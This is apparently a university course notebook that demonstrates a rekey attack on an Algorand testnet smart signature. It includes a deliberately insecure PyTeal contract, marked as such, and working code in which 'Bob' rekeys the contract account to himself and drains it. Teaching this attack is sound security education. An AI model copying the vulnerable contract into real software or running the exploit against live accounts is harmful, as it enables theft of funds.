# Smart signatures – Rekey attack
#### 06.1 Writing Smart Contracts
##### Peter Gruber (peter.gruber@usi.ch)
2022-01-12

* Write and deploy smart Signatures

## Setup
See notebook 04.1, the lines below will always automatically load functions in `algo_util.py`, the five accounts and the Purestake credentials

In [17]:
# Loading shared code and credentials
import sys, os

codepath = '..'+os.path.sep+'..'+os.path.sep+'sharedCode'
sys.path.append(codepath)
from algo_util import *
cred = load_credentials()

# Shortcuts to directly access the 3 main accounts
MyAlgo  = cred['MyAlgo']
Alice   = cred['Alice']
Bob     = cred['Bob']
Charlie = cred['Charlie']
Dina    = cred['Dina']

In [18]:
from algosdk import account, mnemonic
from algosdk.v2client import algod
from algosdk.future import transaction
from algosdk.future.transaction import PaymentTxn
from algosdk.future.transaction import AssetConfigTxn, AssetTransferTxn, AssetFreezeTxn
from algosdk.future.transaction import LogicSig, LogicSigTransaction

import algosdk.error
import json
import base64
import hashlib

In [19]:
from pyteal import *

In [20]:
# Initialize the algod client (Testnet or Mainnet)
algod_client = algod.AlgodClient(algod_token='', algod_address=cred['algod_test'], headers=cred['purestake_token'])

In [21]:
print(Alice['public'])
print(Bob['public'])
print(Charlie['public'])

HITPAAJ4HKANMP6EUYASXDUTCL653T7QMNHJL5NODL6XEGBM4KBLDJ2D2E
O2SLRPK4I4SWUOCYGGKHHUCFJJF5ORHFL76YO43FYTB7HUO7AHDDNNR5YA
5GIOBOLZSQEHTNNXWRJ6RGNPGCKWYJYUZZKY6YXHJVKFZXRB2YLDFDVH64


#### Check Purestake API

In [22]:
last_block = algod_client.status()["last-round"]
print(f"Last committed block is: {last_block}")

Last committed block is: 19806245


## Clearing out Modesty – Rekey attack

##### Step 1: The programmer writes down the conditions as a PyTeal program

In [29]:
max_amount = Int(int(1*1E6))                         # <---- 1e6 micro Algos = 1 Algo

modest_pyteal = And (
    Txn.receiver() == Addr(Bob["public"]),           # Receipient must be Bob
    Txn.amount() <= max_amount,                       # Requested amount must be smaller than max_amount
    Int(1) == Int(1)
)

# Security missing ... do not copy-paste

##### Step 2: Compile PyTeal -> Teal

In [30]:
modest_teal = compileTeal(modest_pyteal, Mode.Signature, version=3)
print(modest_teal)

#pragma version 3
txn Receiver
addr O2SLRPK4I4SWUOCYGGKHHUCFJJF5ORHFL76YO43FYTB7HUO7AHDDNNR5YA
==
txn Amount
int 1000000
<=
&&
int 1
int 1
==
&&


##### Step 3: Compile Teal -> Bytecode for AVM

In [31]:
Modest = algod_client.compile(modest_teal)
Modest

{'hash': '7LREGVE6QG2CUSHARWHVSJXYRATC3KKPBXSMX4E6UKNRQFH2N3VSMPHX4U',
 'result': 'AyACwIQ9ASYBIHakuL1cRyVqOFgxlHPQRUpL10TlX/2Hc2XEw/PR3wHGMQcoEjEIIg4QIyMSEA=='}

##### Step 4: Alice funds and deploys the smart signature

In [32]:
# Step 1: prepare transaction
sp = algod_client.suggested_params()
amt = int(2.2*1e6)
txn = transaction.PaymentTxn(sender=Alice['public'], sp=sp, receiver=Modest['hash'], amt=amt)

# Step 2+3: sign and sen
stxn = txn.sign(Alice['private'])
txid = algod_client.send_transaction(stxn)

# Step 4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  19806305.
Waiting for round 19806305 to finish.
Waiting for round 19806306 to finish.
Transaction TQXLIJE5533NOQBCYZ7JLKUDMVKUFYFIDL5Q3MXMAITQ5I3FTAYQ confirmed in round 19806307.


##### Step 5: Alice informs Bob

In [33]:
print("Alice communicates to Bob the following")
print("Compiled smart signature:", Modest['result'])
print("Address of smart signature: ", Modest['hash'])

Alice communicates to Bob the following
Compiled smart signature: AyACwIQ9ASYBIHakuL1cRyVqOFgxlHPQRUpL10TlX/2Hc2XEw/PR3wHGMQcoEjEIIg4QIyMSEA==
Address of smart signature:  7LREGVE6QG2CUSHARWHVSJXYRATC3KKPBXSMX4E6UKNRQFH2N3VSMPHX4U


#### Step 6: Bob proposes a malicious transaction

In [34]:
# Step 1: prepare TX
sp = algod_client.suggested_params()
withdrawal_amt = int(0*1e6)              # <---------- zero!
txn = PaymentTxn(sender=Modest['hash'], sp=sp, 
                 receiver=Bob['public'], amt=withdrawal_amt,
                 rekey_to = Bob['public'])

# Step 2: sign TX <---- This step is different!
encodedProg = Modest['result'].encode()
program = base64.decodebytes(encodedProg)
lsig = LogicSig(program)
stxn = LogicSigTransaction(txn, lsig)

# Step 3: send
txid = algod_client.send_transaction(stxn)

# Step 4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  19806318.
Waiting for round 19806318 to finish.
Waiting for round 19806319 to finish.
Transaction LVIXHE3ZF66OSQPCZU34QKWWKGNUC74D74Y5FYMHJGU4EYGXT6TA confirmed in round 19806320.


#### Step 7: Bob is now in the possession of the whole account
* He can make a simple payment TX to himself

In [35]:
# Step 1: prepare TX
sp = algod_client.suggested_params()
withdrawal_amt = int(2*1e6)              # <---------- everything minus minimum
txn = PaymentTxn(sender=Modest['hash'], sp=sp, 
                 receiver=Bob['public'], amt=withdrawal_amt)

# Step 2: sign TX <---- This step is different!
stxn = txn.sign(Bob['private'])

# Step 3: send
txid = algod_client.send_transaction(stxn)

# Step4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  19806338.
Waiting for round 19806338 to finish.
Waiting for round 19806339 to finish.
Transaction ALDZIXHV4NYP5RIMP2DKVLQMUTKOQLMOH4X3AI25GWVM7LIBSCNA confirmed in round 19806340.


In [36]:
# Check on Algoexplorer
print('https://testnet.algoexplorer.io/address/'+ Modest['hash'])
print('https://testnet.algoexplorer.io/address/'+ Bob['public'])

https://testnet.algoexplorer.io/address/7LREGVE6QG2CUSHARWHVSJXYRATC3KKPBXSMX4E6UKNRQFH2N3VSMPHX4U
https://testnet.algoexplorer.io/address/O2SLRPK4I4SWUOCYGGKHHUCFJJF5ORHFL76YO43FYTB7HUO7AHDDNNR5YA


# Appendix: why the `Int(int(1e6))`
Pyteal requires the type `pyteal.Int` (with large I). This can only be obtained from Python's `int` type.

In [47]:
a = 1E6
type(a)

float

In [48]:
b = int(1E6)
type(b)

int

In [29]:
c = Int(int(1E6))
type(c)

pyteal.Int

In [30]:
# This is not possible
d = Int(1E6)

TealInputError: invalid input type <class 'float'> to Int